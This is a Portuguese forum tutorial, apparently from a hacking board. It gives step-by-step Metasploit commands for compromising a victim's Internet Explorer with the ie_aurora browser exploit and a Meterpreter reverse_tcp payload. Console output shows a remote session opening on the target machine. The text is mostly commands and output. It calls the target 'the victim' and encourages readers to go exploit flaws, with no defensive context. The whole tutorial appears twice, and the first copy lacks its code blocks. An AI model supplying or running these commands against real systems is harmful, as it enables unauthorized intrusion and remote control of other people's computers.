Olá pessoal! Primeiro tutorial aqui, então qualquer dúvida só postar no tópico que quando tiver tempo irei responder... sem mais delongas! É uma maneira fácil, aliás, Metasploit é um acervo de vulnerabilidades, então, essa é somente uma.
Necessários:
- Metasploit --Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...--
- Ter o Metasploit atualizado.
Tutorial para atualizar o Metasploit
Caso for Windows, assim que instala ele pergunta se você quer atualizar, e tem uma plataforma mais fácil e acessível para isso. Essa parte será para os usuários de Linux:
Acesse a pasta onde está o Metasploit e digite:
Pronto. Seu Metasploit está atualizado.
A invasão
Agora abra o console do Metasploit (msfconsole) e digite:
Logo, você irá perceber que já está executando a exploit
Obs.: exploit é uma sequência de comandos que explora uma falha.
Digite agora:
Obs.: um payload é um módulo que utiliza a falha (exploit).
Irá obter a seguinte mensagem:
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Remote IP:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...[*] Server started.
Abra o IE na máquina da vítima e digite o ip dela no navegador. Se der certo irá aparecer a seguinte mensagem:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
...
E irá iniciar uma sessão.
Espero que entendam, qualquer dúvida só postar ai. Como viram é bem simples, e lembre-se nem todos as máquinas tem essa vulnerabilidade, este só foi um exemplo de invasão por uma vulnerabilidade no IE. Estudem as falhas e tentem explorá-las!
See ya!
Necessários:
- Metasploit --Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...--
- Ter o Metasploit atualizado.
Tutorial para atualizar o Metasploit
Caso for Windows, assim que instala ele pergunta se você quer atualizar, e tem uma plataforma mais fácil e acessível para isso. Essa parte será para os usuários de Linux:
Acesse a pasta onde está o Metasploit e digite:
Código:
svn update
A invasão
Agora abra o console do Metasploit (msfconsole) e digite:
Código:
use exploit/windows/browser/ie_aurora
Código:
msf exploit(ie_aurora) >
Digite agora:
Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Código:
set RHOST (ip alvo) set URIPATH / exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Remote IP:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...[*] Server started.
Abra o IE na máquina da vítima e digite o ip dela no navegador. Se der certo irá aparecer a seguinte mensagem:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
...
E irá iniciar uma sessão.
Espero que entendam, qualquer dúvida só postar ai. Como viram é bem simples, e lembre-se nem todos as máquinas tem essa vulnerabilidade, este só foi um exemplo de invasão por uma vulnerabilidade no IE. Estudem as falhas e tentem explorá-las!
See ya!